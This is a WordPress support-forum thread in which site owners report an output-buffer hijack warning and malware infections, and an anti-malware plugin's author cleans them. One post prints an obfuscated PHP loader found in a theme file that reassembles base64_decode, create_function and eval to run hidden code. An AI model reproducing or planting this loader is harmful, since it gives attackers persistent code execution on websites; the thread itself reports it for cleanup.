Output Buffers

Home Forums Support Forum Output Buffers

This topic contains 13 replies, has 5 voices, and was last updated by  Ioannis Ntizoglou 8 years, 7 months ago.

Viewing 14 posts - 1 through 14 (of 14 total)
  • Author
    Posts
  • #900

    Eli,  I’ve just started to see this message at the top of the screen when running the plug-in

    “Another Plugin or Theme is using ‘ZM5j2q0shf_callback’ to handle out buffers…”

    I have 2 wordpress sites (both on bluehost) and updated the plugin last week and it ran on both with no issues or errors.

    Any idea what’s happening… (I haven’t done any updates since the successful running of the plugin a few days ago)??

    Gene.

    #901

    Anti-Malware Admin
    Key Master

    I put that warning in my plugin because a lot of malicious code I find adds malicious content to the infected site by hijacking the output buffer. There are legitimate uses for adding a callback function to the output handler, but ZM5j2q0shf_callback sounds malicious to me.

    If my plugin is not finding the malicious code I can look for it for you. This may be a new threat that is not yet in my definitions.

    #902

    Hi Eli,

    I just scanned both of the wordpress sites last weekend and they were fine and cleaned.  This is something new… 1 of the sites is so slow it won’t respond, the other seems fine.   I’m running scans on both right now (hosted at bluehost) and both off of the same account.  The site that blew up is showing 104% and seems stuck at this point (but I can’t tell)…

    I’d be happy to let you look at anything you would like but would rather not post details here…

    Gene.

    #903

    both scans are hung at 103-104%… there are read/write errors, Quarantined files and threats..but the scan doesn’t seem to complete… hangs there…

    Would love any help you could give, as both of these sites were updated and cleaned last weekend.

    Gene.

    #904

    Anti-Malware Admin
    Key Master

    Thanks for sending me all the login info for your server. I discovered two new threats that had infected all your themes, these were causing the 500 errors on your site. I was able to add these new threats to my definition update and my plugin has now removed them from 36 files on your site that were found to be infected.

    Your site loads fine now and is no longer flagged as infected by sucuri. Please let me know if there is anything else you need.

    Aloha, Eli

    #1021

    Tony S
    Member

    This one is affecting me as well.

     

    Another Plugin or Theme is using ‘ZM5j2q0shf_callback’ to handle output buffers. This prevents actively outputing the buffer on-the-fly and will severely degrade the performance of this (and many other) Plugins. Consider disabling caching and compression plugins (at least during the scanning process).

     

    I thought I had cleaned the site out a few weeks back, things have been great… recently though I found the site to be sluggish and noticed new code injection and EVAL’s back on some html files etc… I’ve run through scans, done some cleaning… but I’m still seeing the message above. I’ve been unable to locate the malicious code… Any tips on where/how I would be able to locate/narrow down the location?

    Thanks

    #1022

    Anti-Malware Admin
    Key Master

    If you still need help with this you can email me directly with your WP Admin login.

    #1023

    Tony S
    Member

    Thanks Eli. I have created you an account and you should get an automatic email with the credentials. I will email you additionally from another email account as well.

    Tony

    #1024

    Tony S
    Member

    Any luck with the info I passed along? Appreciate the help sir!

    #1025

    Tony S
    Member

    I was able to narrow it down to the theme still being infected…

    Found this in an index.html file that should have been a //silence is golden…

     

    <code>function  RxMe258j7ipNk($qBXaOppg,$z0jHegeQECtIupH,$aQU00Jarx){return str_replace($qBXaOppg,$z0jHegeQECtIupH,$aQU00Jarx);} function  FFq70nBpCepT0cn7H($qBXaOppg,$z0jHegeQECtIupH,$aQU00Jarx){return str_replace($qBXaOppg,$z0jHegeQECtIupH,$aQU00Jarx);} function  bAZaPFs4rcjfP($qBXaOppg,$z0jHegeQECtIupH,$aQU00Jarx){return str_replace($qBXaOppg,$z0jHegeQECtIupH,$aQU00Jarx);} $PsiKcj = ‘bpvR3tuMoPapvR3tuMoPspvR3tuMoPepvR3tuMoP6pvR3tuMoP4pvR3tuMoP_pvR3tuMoPdpvR3tuMoPepvR3tuMoPcpvR3tuMoPopvR3tuMoPdpvR3tuMoPe’; $PsiKcj = bAZaPFs4rcjfP(‘pvR3tuMoP’,”,$PsiKcj); $X7qo07j8PzkRGXSb6S = ‘cuWToYN2EZoruWToYN2EZoeuWToYN2EZoauWToYN2EZotuWToYN2EZoeuWToYN2EZo_uWToYN2EZofuWToYN2EZouuWToYN2EZonuWToYN2EZocuWToYN2EZotuWToYN2EZoiuWToYN2EZoouWToYN2EZon’; $X7qo07j8PzkRGXSb6S = bAZaPFs4rcjfP(‘uWToYN2EZo’,”,$X7qo07j8PzkRGXSb6S); $IVV95C = ‘A6DyoM9rVXEheA6DyoM9rVXEhvA6DyoM9rVXEhaA6DyoM9rVXEhl’; $IVV95C = bAZaPFs4rcjfP(‘A6DyoM9rVXEh’,”,$IVV95C); $YrRosvlJKcGUbmkl4Q = ‘$aja4icZ4kQPRYcL’; $eS5vP9gB9c4OPmv4ER = $X7qo07j8PzkRGXSb6S($YrRosvlJKcGUbmkl4Q,$IVV95C.’(‘.$PsiKcj.’(‘.$YrRosvlJKcGUbmkl4Q.’));’); $eS5vP9gB9c4OPmv4ER(‘’);</code>

    #1026

    Anti-Malware Admin
    Key Master

    I just wanted to make sure you knew that I have added this code to my definition updates and I haven’t seen it come up any more. I think your site is clean now but if you do get re-infected please email me directly so I can check the file stats before you clean it. The timestamps on the infected files are critical to determining where the exploit is coming from if there is still a vulnerability on your site.

    #1151

    Octa Rendra
    Member

    Hello Elly

    First of all Great Plugin!

    I really need some help, I have lots of malware detected , and also it says: Another Plugin or Theme is using ‘ZM5j2q0shf_callback’ to handle output buffers

     

    Can you please help me? I dont mind to give you my admin access

    Thanks before,

    Octa

    #1152

    Anti-Malware Admin
    Key Master

    My plugin is designed to fix the Known Threats for you automatically. I don’t mind helping when help is needed but the whole point of my plugin is to help people cleanup their own site without needing to hire a professional.

    You have not stated that you even tried to fix the malware that was already detect. Can you please use the Automatic Fix button in my plugin and then, if you still need more help, please let me know what my plugin was unable to do for you so I know what kind of help to offer?

    #1552

    Just send you an email with the login details.

    I have the same problem, unable to run the scan.

    can you please have a look.

    Many thanks in advance.

    Talk soon.

Viewing 14 posts - 1 through 14 (of 14 total)

You must be logged in to reply to this topic.

Comments are closed.